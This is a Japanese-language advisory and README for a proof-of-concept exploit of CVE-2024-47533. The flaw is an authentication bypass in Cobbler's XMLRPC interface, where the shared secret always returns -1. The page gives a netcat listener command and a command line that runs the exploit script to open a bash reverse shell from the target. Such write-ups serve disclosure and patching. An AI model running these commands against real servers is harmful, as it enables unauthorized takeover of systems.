
CVE-2024-47533 は、Cobbler(バージョン 3.0.0 から 3.2.3 未満、および 3.3.7)における深刻な認証バイパスの脆弱性であり、XMLRPC インターフェースを介して認証されていないリモートコード実行を許します。
⚠️ Cobbler における認証バイパスを利用した重大なリモートコード実行
🛠️ @dollarboysushil による PoC 実装
Cobbler はネットワークインストール環境の迅速なセットアップを可能にする Linux インストールサーバーであり、バージョン 3.0.0 から 3.2.3 未満および 3.3.7 未満に認証の脆弱性があります。関数 utils.get_shared_secret() は常に -1 を返すため、誰でも空のユーザー名 ('') とパスワード -1 で Cobbler XML-RPC インターフェースに接続できます。これにより、ネットワークアクセスを持つ攻撃者が Cobbler サーバーの完全な制御を取得できます。この脆弱性はバージョン 3.2.3 および 3.3.7 で修正されています。
この脆弱性は、utils.get_shared_secret() 関数における共有シークレットの不適切な処理に起因し、この関数は常に -1 を返すため、認証を実質的にバイパスします。これにより、ネットワーク上の任意のユーザーが空の認証情報で Cobbler の XMLRPC インターフェースに接続し、任意のコマンドを実行できます。
http://<target>:25151/ — Cobbler の XMLRPC API エンドポイント
エクスプロイトスクリプトは以下のさまざまなリバースシェルペイロードをサポートしています:
nc, nc2)あなたのマシンで Netcat リスナーを起動します:
nc -lvnp 4444

エクスプロイトスクリプト CVE-2024-47533-dbs.py を実行します。
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

正常に実行されると、リバースシェルがリスナーに接続し、攻撃者にサーバーへのリモートアクセスを付与します。
